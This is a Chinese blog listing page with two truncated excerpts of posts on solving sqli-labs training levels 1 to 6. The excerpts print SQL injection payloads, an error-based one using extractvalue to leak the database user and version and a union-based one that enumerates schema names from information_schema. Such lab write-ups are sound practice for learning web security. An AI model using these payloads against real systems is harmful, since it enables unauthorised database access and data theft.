2020年3月15日
sqli lab less-5-6
摘要: less-5 基于报错的注入 基于报错可以爆出当前数据库名等等 id=2’ and extractvalue(1, concat(0x7c,(select user())));-- # ?id=2’ and extractvalue(1, concat(0x7c,(select @@version) 阅读全文
posted @ 2020-03-15 16:26 10nnn4R 阅读(130) 评论(0) 推荐(0) 编辑
sqli lab 1-4
摘要: less-1 爆库 id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata –+# 爆表 ?id=1222’ union select 1,group_concat(t 阅读全文
posted @ 2020-03-15 15:27 10nnn4R 阅读(129) 评论(0) 推荐(0) 编辑